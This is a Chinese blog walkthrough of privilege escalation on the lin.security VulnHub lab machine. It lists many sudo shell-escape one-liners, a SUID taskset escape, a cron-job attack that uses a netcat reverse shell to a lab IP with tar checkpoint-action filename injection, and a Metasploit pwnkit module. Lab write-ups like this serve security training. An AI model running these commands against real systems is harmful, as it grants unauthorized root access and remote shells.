Featured image of post Linux提权靶机lin.security
内网安全 靶场攻略

Linux提权靶机lin.security

Linux提权靶机lin.security

靶机下载地址:https://download.vulnhub.com/linsecurity/lin.security_v1.0.ova

lin.security_v1.0靶机-CSDN博客

1
2
3
4

# 使用命令
bob/secret

ssh bob@192.168.145.174

1.主机基本信息收集 

1
2
3
4
5

id
whoami
uname -a                 //查看内核版本信息
cat /etc/passwd          //查看主机用户
sudo -l                  //显示允许当前用户使用的命令


1
2
3
4
5
6
7
8
9

bob@linsecurity:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less,
        /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git,
        /usr/bin/script, /usr/bin/scp

发现以上命令可以使用sudo权限

通过该网址进行搜索哪些可以使用sudo进行提权

https://gtfobins.github.io/#ash

2.Sudo类提权

2.1.ash提权 

1

sudo ash

2.2.awk提权 

1

sudo awk 'BEGIN {system("/bin/sh")}'

2.3.bash提权

1

sudo bash

2.4.csh提权 

1

sudo csh

2.5.dash提权 

1

sudo dash

2.6.ed提权 

1
2

sudo ed
!/bin/bash

2.7.env提权 

1

sudo env /bin/bash

2.8.expect提权 

1

sudo expect -c 'spawn /bin/sh;interact'

2.9.find提权 

1

sudo find . -exec /bin/sh \; -quit

2.10.ftp提权 

1
2

sudo ftp
!/bin/bash

2.11.less/more提权 

1
2
3
4
5

sudo less /etc/profile
!/bin/bash

TERM= sudo more /etc/profile
!/bin/sh

2.12.man提权 

1

sudo man man

2.13.SCP提权 

1
2
3
4

bob@linsecurity:~$ TF=$(mktemp)
bob@linsecurity:~$ echo 'sh 0<&2 1>&2' > $TF
bob@linsecurity:~$ chmod +x "$TF"
bob@linsecurity:~$ sudo scp -S $TF x y:

2.14.socat提权 

1

sudo socat stdin exec:/bin/sh

2.15.ssh权限提升 

1

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

2.16.vi权限提升 

1

sudo vi -c ':!/bin/sh' /dev/null

2.17.zsh权限提升 

1

sudo zsh

2.18.perl提权 

1

sudo perl -e 'exec "/bin/sh";'

2.19.tclsh提权 

1
2
3

# 使用命令
# sudo tclsh
# exec /bin/sh <@stdin >@stdout 2>@stderr

2.20.git提权 

1
2
3

# 使用命令
# sudo git -p help config
# !/bin/sh

2.21.script提权 

1
2

# 使用命令
# sudo script -q /dev/null

3.SUID提权

3.1.taskset提权 

1

taskset 1 /bin/bash -p

4.计划任务提权

原理:****提权的原理为计划任务以root权限运行,计划任务中的脚本其他用户有写入的权限,或者脚本所属组为其他用户,则可以进行计划任务提权。

1
2

crontab -l          //查看当前用户的计划任务
cat /etc/crontab    //查看服务器所有用户的计划任务


1
2

//每分钟以root权限执行/etc/cron.daily目录下的backup脚本
*/1 *   * * *   root    /etc/cron.daily/backup

如果当前低权限用户有权限修改这个backup脚本,那么就可以写个反弹shell命令,计划任务每分钟就会以root权限反弹shell到本机实现权限提升

1

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.165.31 lport=9999 R


1
2
3
4
5
6
7
8

# 使用命令
# echo "mkfifo /tmp/htukkim; nc 192.168.165.31 9999 0</tmp/htukkim | /bin/sh >/tmp/htukkim 2>&1; rm /tmp/htukkim" > shell.sh && chmod +x shell.sh
 
# echo > "--checkpoint-action=exec=sh shell.sh"
 
# echo > "--checkpoint=1"
 
# nc -lvnp 9999

此时成功接收到root用户的反弹shell会话

1

AzER3pBZh6WZE     ===>    P@ssw0rd

5.内核提权漏洞 

1

use linux/local/cve_2021_4034_pwnkit_lpe_pkexec

By Lsec
最后更新于 Jun 17, 2025 22:24 +0800
comments powered by Disqus
© 2025 - 2026 Lsec's Blog
使用 Hugo 构建
主题 StackJimmy 设计
¹鵵ҳ